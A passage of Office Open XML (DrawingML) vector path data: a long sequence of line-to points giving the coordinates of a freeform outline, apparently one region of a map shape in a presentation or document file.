                      <a:pt x="1894" y="1150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1908" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1909" y="1128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1912" y="1113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1912" y="1105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1914" y="1095"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1912" y="1087"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1912" y="1085"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1913" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1918" y="1061"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1922" y="1055"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1924" y="1050"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1926" y="1044"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1925" y="1042"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1921" y="1040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1924" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1923" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1920" y="1026"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1924" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1924" y="1020"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1921" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1918" y="1014"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1912" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1908" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1903" y="995"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1897" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1892" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1887" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1881" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1881" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1879" y="1006"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1875" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1863" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1860" y="1008"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1861" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1864" y="1001"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1865" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1860" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1855" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1851" y="1004"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1849" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1849" y="997"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1851" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1846" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1839" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1832" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1829" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1826" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1825" y="975"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1827" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1831" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1845" y="955"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1851" y="951"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1863" y="940"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1869" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1880" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1889" y="907"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1895" y="901"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1907" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1914" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1916" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1922" y="869"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1928" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1932" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1937" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1944" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1952" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1953" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1959" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1967" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1976" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1983" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1992" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1994" y="844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1994" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1996" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2001" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2002" y="845"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2002" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2006" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2013" y="844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2018" y="845"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2023" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2032" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2035" y="844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2040" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2044" y="845"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2045" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2045" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2050" y="832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055" y="832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2061" y="832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2067" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2070" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2076" y="837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2083" y="837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2089" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2095" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2093" y="850"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2087" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2082" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2081" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2083" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2087" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2092" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2100" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2105" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2110" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2112" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2115" y="850"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2120" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2127" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2135" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2143" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2143" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2141" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2131" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2128" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2128" y="833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2130" y="826"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2134" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2140" y="813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2147" y="807"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2156" y="802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2155" y="794"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2158" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2167" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2166" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2167" y="774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2173" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2178" y="766"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2185" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2194" y="763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2206" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2210" y="764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2212" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2215" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2223" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2226" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2226" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2225" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2222" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2220" y="784"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2221" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2228" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2225" y="796"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2224" y="801"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2226" y="801"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2234" y="796"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2248" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2259" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2263" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2267" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2268" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2267" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2272" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2271" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2277" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2284" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2289" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2304" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2308" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2304" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2292" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2287" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2286" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2286" y="763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2281" y="776"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2285" y="780"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2284" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2278" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2277" y="797"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2262" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2253" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2251" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2248" y="821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2237" y="833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2231" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2218" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2217" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2214" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2210" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2197" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2192" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2185" y="889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2173" y="893"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2174" y="896"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2174" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2173" y="903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2169" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2164" y="917"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2156" y="929"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2154" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2152" y="949"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2152" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2152" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2154" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2154" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2155" y="986"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2156" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2156" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2159" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2161" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2163" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2166" y="1040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2166" y="1049"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="1057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2169" y="1067"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2171" y="1074"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2173" y="1072"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2179" y="1067"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2191" y="1056"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2196" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2198" y="1042"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2200" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2199" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2200" y="1026"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2205" y="1022"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2213" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2217" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2222" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2223" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2222" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2219" y="1006"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2218" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2219" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2223" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2224" y="990"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2230" y="984"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2235" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2237" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2242" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2249" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2254" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2256" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2255" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2250" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2248" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2249" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2253" y="943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2261" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2264" y="929"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2267" y="929"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2264" y="936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2264" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2268" y="942"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2272" y="941"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2274" y="936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2274" y="928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2273" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2267" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2265" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2264" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2265" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2270" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2273" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2273" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2269" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2259" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2255" y="889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2252" y="885"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2253" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2255" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2259" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2265" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2270" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2268" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2269" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2275" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2273" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2272" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2273" y="833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2278" y="825"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2280" y="824"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2284" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2289" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2292" y="821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2294" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2297" y="830"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2301" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2302" y="821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2305" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="816"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2315" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2318" y="810"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2322" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2318" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2319" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2323" y="825"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2333" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2336" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2346" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2354" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2362" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2369" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2374" y="810"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2375" y="815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2377" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2381" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2384" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2387" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2387" y="815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2388" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2391" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2400" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2402" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2414" y="792"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2416" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2422" y="779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2429" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2432" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2436" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2438" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2445" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2450" y="764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2451" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2455" y="758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2456" y="758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2465" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2486" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2487" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2491" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2493" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2496" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2496" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2498" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2504" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2514" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2517" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2521" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2526" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2529" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2529" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2530" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2524" y="728"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2526" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2525" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2521" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2518" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2515" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2511" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2516" y="696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2516" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2514" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2512" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2512" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2506" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2509" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2502" y="681"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2497" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2495" y="673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2495" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2492" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2490" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2485" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2478" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2476" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2480" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2477" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2480" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2483" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2489" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2496" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2494" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
